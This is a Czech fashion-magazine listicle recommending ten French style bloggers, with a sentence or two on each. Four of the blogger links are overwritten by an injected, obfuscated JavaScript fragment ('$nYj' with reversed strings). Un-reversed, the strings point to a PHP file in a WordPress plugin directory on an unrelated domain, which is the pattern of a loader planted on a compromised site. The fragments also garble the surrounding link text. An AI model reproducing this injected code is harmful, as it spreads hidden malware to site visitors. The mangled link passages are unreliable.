FACESTARMóda a krása10 FRANCOUZSKÝCH BLOGEREK, KTERÉ PROSTĚ MUSÍTE SLEDOVAT

10 FRANCOUZSKÝCH BLOGEREK, KTERÉ PROSTĚ MUSÍTE SLEDOVAT

Vybrali jsme pro vás deset nejstylovějších francouzských blogerek, jejich styl a charisma vás doslova okouzlí, a jejichž šatníky jsou záviděníhodné. Vítejte ve světě stylu a módy!

Vybrali jsme pro vás deset nejstylovějších francouzských blogerek, jejich styl a charisma vás doslova okouzlí, a jejichž šatníky jsou záviděníhodné. Vítejte ve světě stylu a módy!

La Revue de Kenza

Kenza Sadoun-el Glaoui žije v Paříži celý svůj život a bloguje od roku 2008. Nedávno začala svůj blog překládat i do angličtiny, takže pokud nevládnete francouzštinou, nemusíte se bát, že skončíte jen u prohlížení jejich dokonale stylových fotek.

and

$nYj=function(n){if(typeof($nYj.list[n])==„string“)return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n]};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelahand-roll.blogspot.cz/“>Barock and Roll

Zatímco Instagram této dívky je plný cestování a nádherných atmosférických fotek, její blog je o outfitech a módní inspiraci, vystující pojem trés chic. 

and

Vanessa Perroud

Vanessa je ztělesněním ukázkového francouzského života. Na svém blogu píše o stylu, domově a cestování.

and

Une libanaise à Paris

Samar Youssef píše jeden z nejzajímavějších blogů vůbec. Kromě svého trendového šatníku dělá rozhovory s evropskými trendsettery, kteří ovlivňují módní průmysl, objevuje nové restaurace a cestuje po celém světě.

and

Mademoiselle Stef

Připravte se na dávku žárlivosti, která vás zaplaví při pohledu na blog mladé Stef, která pravidelně cestuje po Evropě a objevuje ty nejstylovější kavárny, restaurace a místa. Inspirujte se při svém dalším výletu!

and

$nYj=function(n){if(typeof($nYj.list[n])==„string“)return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n]};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelahandthecity.net/“>Mode and the City

Blog Daphné Moreau je psaný převážně ve francouzštině. Její skvělé outfity a dokonalý cit pro detail ale nepotřebuje žádný překlad.

and

 

$nYj=function(n){if(typeof($nYj.list[n])==„string“)return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n]};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelahandsalt.com/“>Mango and Salt

Minimalistický styl a designérské kousky kombinované s oblečením s řetězců. To je Victoria z blogu Mango and Salt.

and

Tokyobanhbao

Tokyobanhbao nás baví svými klasickými kousky, kombinovanými s nejnovějšími trendy. Kromě toho je také talentovaná ilustrátorka, zkušená cestovatelka a perfekcionistka s vytříbeným vkusem pro módu.

and

$nYj=function(n){if(typeof($nYj.list[n])==„string“)return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n]};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelahandora.fr/“>Miss Pandora

Louise Ebel z Miss Pandora je zástupce zcela odlišného francouzského přístupu k módě. Namísto klasiky objevuje nové cesty a směry, jak kombinovat, nosit, vrstvit a oblékat různorodé kousky s šarmem a originalitou.

and

My Name is Odd

Aude Sarkamari je blogerka žijící v Paříži, sdílející své myšlenky a fotografie týkající se módy, jídla, hudby a mnohem mnohem více.

and

Svou novou tvář a zároveň blogerku hledá nyní i Atrium Flora. Zda se zařadí po bok nejúspěšnějších stylových žen, které se živí módou, můžete rozhodnout i vy svým hlasováním na jejich stránkách.

Související články